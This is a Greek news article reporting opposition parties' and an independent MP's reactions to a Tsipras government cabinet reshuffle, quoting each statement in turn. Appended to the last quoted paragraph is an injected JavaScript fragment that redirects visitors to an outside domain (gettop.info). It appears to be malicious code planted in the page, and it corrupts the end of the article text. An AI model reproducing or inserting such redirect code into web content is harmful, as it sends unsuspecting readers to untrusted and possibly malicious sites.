Αντιπολιτευτικά «πυρά» για τον ανασχηματισμό

0
3

 

Έντονες είναι οι αντιδράσεις εκ μέρους όλων των κομμάτων της αντιπολίτευσης με αφορμή την ανακοίνωση της σύνθεσης της νέας κυβέρνησης.

Ν.Δ.: Ανακύκλωση φθαρμένων προσώπων, νέα υπουργεία για τους «κολλητούς»
«Μετά από πολλή προσπάθεια ο κ. Τσίπρας έκανε έναν ανασχηματισμό ανακύκλωσης των ίδιων φθαρμένων προσώπων της αποτυχημένης κυβέρνησής του», δήλωσε ο εκπρόσωπος Τύπου της ΝΔ Γιώργος Κουμουτσάκος.

Ο Γιώργος Κουμουτσάκος επεσήμανε ότι ο πρωθυπουργός «δημιούργησε δε και ορισμένα υπουργεία για να βολέψει τους κολλητούς του. Για την Ελλάδα και τους πολίτες, δεν υπάρχει καμία προοπτική απ’ αυτήν την επικίνδυνη κυβέρνηση. Η ανάγκη πολιτικής αλλαγής γίνεται ακόμη πιο ισχυρή».

Το Ποτάμι: Ο Τσίπρας έχει χρέη στους ΑΝΕΛ…
«Η κοινωνία δεν θέλει περισσότερα υπουργεία και υφυπουργεία. Η κοινωνία θέλει λύσεις, απαντήσεις, αποτελέσματα», τονίζει σε ανακοίνωσή του το Ποτάμι για τον ανασχηματισμό και προσθέτει:

«Η χώρα δε θέλει λαϊκιστές, ερασιτέχνες και κομματικούς υπαλλήλους. Ο κ.Τσίπρας όμως δεν ξέρει άλλο δρόμο. Και έχει χρέη στους ΑΝΕΛ, στην εκκλησία, στο παλιό σύστημα, στους κομματικούς του βαρόνους. Έρμη Ελλάς».

ΚΚΕ: Ο ανασχηματισμός θα υλοποιεί μέχρι κεραίας τις δεσμεύσεις του 3ου μνημονίου
Πέρα απ’ τον επικοινωνιακό του χαρακτήρα, ο ανασχηματισμός της κυβέρνησης ΣΥΡΙΖΑ – ΑΝΕΛ, έχει στόχο τη δημιουργία ενός σχήματος που, με μεγαλύτερη σταθερότητα και όσο δυνατόν λιγότερες ταλαντεύσεις, θα υλοποιεί μέχρι κεραίας τις αντιλαϊκές αναδιαρθρώσεις και τις δεσμεύσεις του 3ου μνημονίου.

Η επιδίωξη απόδοσης ευθυνών για τα αντιλαϊκά μέτρα, που προκάλεσαν γενικευμένη λαϊκή αγανάκτηση και οργή (π.χ. ασφαλιστικό), σε ορισμένα μόνο πρόσωπα και χειρισμούς, δεν πρέπει να κρύψουν τη συνολική κυβερνητική ευθύνη και πολιτική, την οποία υπηρέτησαν με συνέπεια και τα συγκεκριμένα πρόσωπα.

Ο κυβερνητικός ανασχηματισμός, ένα χρόνο μετά τις εκλογές, σε συνδυασμό με τη συνολικότερη λαϊκή δυσαρέσκεια κι απογοήτευση για την κυβέρνηση ΣΥΡΙΖΑ – ΑΝΕΛ, δείχνει ότι η δυνατότητα μιας κυβέρνησης να παραπλανά και να εγκλωβίζει, σε συνθήκες κρίσης και μνημονίων, επί μακρόν εργατικές – λαϊκές δυνάμεις, έχει περιοριστεί. Το ζήτημα είναι ο λαός να γυρίσει σταθερά την πλάτη σε εκείνες τις πολιτικές δυνάμεις που, μέσω της κυβερνητικής εναλλαγής, του υπόσχονται ότι η καπιταλιστική ανάκαμψη σε όφελος των μονοπωλίων, θα φέρει διέξοδο κι ανακούφιση στα οξυμμένα λαϊκά προβλήματα. Να εμπιστευτεί τη δική του δύναμη και να οργανώσει την αντεπίθεσή του, χωρίς καθυστέρηση, για να βάλει εμπόδια στην αντιλαϊκή πολιτική, στοχεύοντας τον πραγματικό αντίπαλο, το κεφάλαιο και την εξουσία του. Ελπίδα κι αποκούμπι σ’ αυτόν τον αγώνα μπορεί να είναι ένα πολύ πιο ισχυρό ΚΚΕ.

Ένωση Κεντρώων: Αν αποτύχει αυτό το σχήμα θα είναι το τελευταίο πριν τις εκλογές
«Ευχόμαστε στην κυβέρνηση να βρει ένα φιλολαϊκό βηματισμό, ώστε να ασχοληθεί με τα προβλήματα των Ελλήνων πολιτών, ρίχνοντας τα βάρη στους έχοντες και κατέχοντες», υπογραμμίζει σε ανακοίνωσή της η Ένωση Κεντρώων για τον ανασχηματισμό και προσθέτει:

«Αν πάλι, η πράξη δείξει ότι ο ανασχηματισμός, είναι αλλαγή ισορροπιών και όχι αλλαγή πολιτικής, αυτό θα φανεί πολύ γρήγορα. Ο κ. Τσίπρας δεν έχει πολιτικό χρόνο πλέον για πειραματισμούς. Αν αποτύχει, το σχήμα αυτό, θα είναι το τελευταίο πριν τις εκλογές».

Θεοχάρης: Αδύναμος Πρωθυπουργός, αδύναμη κυβέρνηση

«Ούτε 17 ώρες δεν του πήραν του Πρωθυπουργού οι διαπραγματεύσεις με τα στελέχη του για το νέο υπουργικό συμβούλιο», δήλωσε ο ανεξάρτητος βουλευτής Χάρης Θεοχάρης, μετά από την ανακοίνωση του νέου κυβερνητικού σχήματος. Ο κ. Θεοχάρης έκανε λόγο για «σχήμα αποτυχίας», αλλά και για «αδύναμο πρωθυπουργό που έφτιαξε μία αδύναμη κυβέρνηση».

«Οι πολύωρες διαβουλεύσεις και τα εσωκομματικά παζάρια κατέληξαν στη θυσία του κ. Φίλη για χάρη του κ. Καμμένου και στην εφεύρεση νέου υπουργείου για την τακτοποίηση του κ. Παππά μετά το φιάσκο των τηλεοπτικών αδειών. Ένα κυβερνητικό σχήμα 48 μελών για την αποκατάσταση των κατά το δυνατόν περισσότερων κομματικών φίλων», ανέφερε ο κ. Θεοχάρης.

Όπως πρόσθεσε, «έχουμε πλέον δυο κυβερνήσεις: Μια μνημονιακή από την οποία έφυγε κάθε στέλεχος με την ιδεολογία του ΣΥΡΙΖΑ και μια διακοσμητική που θα ασχολείται με τα καθημερινά: Ρουσφέτια, διευθετήσεις και προσλήψεις».

«Στην Υγεία κατά τον κ. Τσίπρα όλα λειτουργούν άψογα. Δεν έχει μάθει για καρκινοπαθείς που δεν έχουν φάρμακα, για νοσοκομεία χωρίς γάζες, για χειρουργεία που έχουν σταματήσει», σχολίασε επίσης ο κ. Θεοχάρης. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here